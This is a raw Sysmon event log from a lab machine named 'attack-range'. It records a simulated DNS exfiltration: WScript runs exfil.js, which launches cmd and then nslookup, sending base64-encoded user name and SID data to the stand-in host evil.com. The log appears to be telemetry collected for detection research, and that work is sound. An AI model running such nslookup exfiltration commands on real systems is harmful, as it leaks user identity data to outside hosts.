14:16:39.741{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.741{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-6341-000000005F02}2932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.741{2E1864BB-17C7-629A-6141-000000005F02}20366984C:\Windows\system32\cmd.exe{2E1864BB-17C7-629A-6341-000000005F02}2932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.747{2E1864BB-17C7-629A-6341-000000005F02}2932C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C7-629A-6141-000000005F02}2036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljiu.tmp 2>&1 10341000x8000000000000000202731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.719{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-6241-000000005F02}7672C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.719{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-6241-000000005F02}7672C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.704{2E1864BB-17C7-629A-6241-000000005F02}76728132C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-6141-000000005F02}2036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.688{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-6241-000000005F02}7672C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.688{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.688{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.688{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.688{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.688{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-6141-000000005F02}2036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.688{2E1864BB-17A1-629A-783D-000000005F02}55527308C:\Windows\System32\WScript.exe{2E1864BB-17C7-629A-6141-000000005F02}2036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.694{2E1864BB-17C7-629A-6141-000000005F02}2036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljiu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.672{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldjmc.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.641{2E1864BB-17C7-629A-5F41-000000005F02}21085948C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-6041-000000005F02}7384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.641{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.641{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.641{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.641{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.641{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-6041-000000005F02}7384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.641{2E1864BB-17C7-629A-5E41-000000005F02}23367932C:\Windows\system32\cmd.exe{2E1864BB-17C7-629A-6041-000000005F02}7384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.649{2E1864BB-17C7-629A-6041-000000005F02}7384C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C7-629A-5E41-000000005F02}2336C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldjmc.tmp 2>&1 354300x8000000000000000202711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.201{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52945- 354300x8000000000000000202710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.200{00000000-0000-0000-0000-000000000000}8096<unknown process>-udpfalsefalse127.0.0.1-52944-false127.0.0.1-53domain 354300x8000000000000000202709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.200{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52944- 354300x8000000000000000202708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.200{00000000-0000-0000-0000-000000000000}8096<unknown process>-udptruefalse127.0.0.1-52944-false127.0.0.1-53domain 354300x8000000000000000202707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.200{00000000-0000-0000-0000-000000000000}8096<unknown process>-udpfalsefalse127.0.0.1-52943-false127.0.0.1-53domain 354300x8000000000000000202706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.200{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52943- 354300x8000000000000000202705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.138{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52942- 354300x8000000000000000202704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.138{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52941- 354300x8000000000000000202703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.138{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52940- 354300x8000000000000000202702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.072{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52939- 354300x8000000000000000202701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.072{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52938- 354300x8000000000000000202700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.071{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52937- 354300x8000000000000000202699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.990{00000000-0000-0000-0000-000000000000}7804<unknown process>-udpfalsefalse127.0.0.1-52936-false127.0.0.1-53domain 354300x8000000000000000202698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.990{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52936- 354300x8000000000000000202697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.990{00000000-0000-0000-0000-000000000000}7804<unknown process>-udptruefalse127.0.0.1-52936-false127.0.0.1-53domain 354300x8000000000000000202696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.990{00000000-0000-0000-0000-000000000000}7804<unknown process>-udpfalsefalse127.0.0.1-52935-false127.0.0.1-53domain 354300x8000000000000000202695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.989{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52935- 354300x8000000000000000202694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.989{00000000-0000-0000-0000-000000000000}7804<unknown process>-udptruefalse127.0.0.1-52935-false127.0.0.1-53domain 354300x8000000000000000202693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.989{00000000-0000-0000-0000-000000000000}7804<unknown process>-udpfalsefalse127.0.0.1-52934-false127.0.0.1-53domain 354300x8000000000000000202692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.989{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52934- 354300x8000000000000000202691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.919{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52933- 354300x8000000000000000202690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.918{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52932- 354300x8000000000000000202689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.918{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52931- 354300x8000000000000000202688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.862{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52930- 354300x8000000000000000202687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.862{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52929- 